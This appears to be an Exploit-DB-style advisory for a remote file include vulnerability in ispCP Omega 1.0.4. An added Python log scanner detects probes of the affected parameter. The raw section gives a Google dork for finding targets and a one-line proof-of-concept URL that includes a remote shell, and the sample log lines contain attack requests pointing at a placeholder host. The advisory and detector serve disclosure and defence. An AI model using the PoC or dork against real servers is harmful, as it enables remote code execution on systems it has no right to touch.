Vendor: ispCP Omega
By: cr4wl3r
CVSS: 9.3 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: ispCP Omega
Affected Version From: 1.0.4
Affected Version To: 1.0.4
Patch Exists: YES
Related CWE: N/A
CPE: ispcp-omega
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ispCP Omega <= 1.0.4 Remote File Include Vulnerability

A vulnerability exists in ispCP Omega version 1.0.4 which allows an attacker to include a remote file via the 'net2ftp_globals[application_skinsdir]' parameter in the 'admin1.template.php' script. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of ispCP Omega.
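
To check whether an installation has been probed through the parameter named in the description, the following added example (not part of the original advisory or of ispCP) scans web-server access logs for requests that supply any net2ftp_globals[...] value. It assumes combined-format logs and that legitimate clients never send this parameter; the log lines, IPs and hosts are constructed.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (combined log format); IPs and hosts are placeholders.
SAMPLE_LOG = '''\
198.51.100.7 - - [12/Mar/2010:10:01:22 +0000] "GET /tools/filemanager/index.php HTTP/1.1" 200 5120
198.51.100.9 - - [12/Mar/2010:10:02:03 +0000] "GET /tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=http://files.example.invalid/x HTTP/1.1" 200 312
198.51.100.9 - - [12/Mar/2010:10:02:09 +0000] "GET /tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals%5Bapplication_skinsdir%5D=..%2F..%2Ftmp HTTP/1.1" 200 0
203.0.113.4 - - [12/Mar/2010:10:05:41 +0000] "POST /tools/filemanager/index.php?state=login HTTP/1.1" 302 0
'''

# Client IP, then the quoted request line: METHOD target HTTP/x.y
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Any attempt to seed the net2ftp_globals array from the request (assumed never legitimate).
GLOBALS_RE = re.compile(r"^net2ftp_globals\[", re.IGNORECASE)
# Value starts with "scheme:" or "//", i.e. it points somewhere other than a local path.
SCHEME_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:|//)", re.IGNORECASE)


def classify(line):
    """Return a finding dict if the request tries to set net2ftp_globals[...], else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # parse_qsl percent-decodes names and values, so %5B/%5D variants are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if GLOBALS_RE.match(name):
            kind = "remote-include" if SCHEME_RE.match(value) else "param-tampering"
            return {"ip": m.group("ip"), "path": path, "param": name,
                    "value": value, "kind": kind}
    return None


def scan(log_text):
    """Classify every line and return the findings in log order."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the parameter was sent; whether the include succeeded depends on the server's PHP settings (register_globals and remote-include support), so treat findings as leads for further review.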

Exploit-DB raw data:

[+] ispCP Omega <= 1.0.4 Remote File Include Vulnerability

[+] Discovered By: cr4wl3r
[+] Download: http://isp-control.net/
[+] Dork: "Powered by ispCP Omega"
[+] Code in [ispcp-omega-1.0.4/gui/tools/filemanager/skins/mobile/admin1.template.php]

[x] <?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>

[+] PoC: [path]/tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=[Shell]

[+] Greetz and thanks to:
[!] str0ke [milw0rm.com]
[!] r0073r, 0x1D [inj3ct0r.com]
[!] opt!x hacker [morrocan hacker]
[!] xoron [turkish hacker]
[!] irvian, cyberlog, [sekuritionline.net]
[!] EA ngel, basix, angky_tatoki, doniskaynet, panteto [manadocoding.net]
[!] boom3rang [khg-cr3w.org]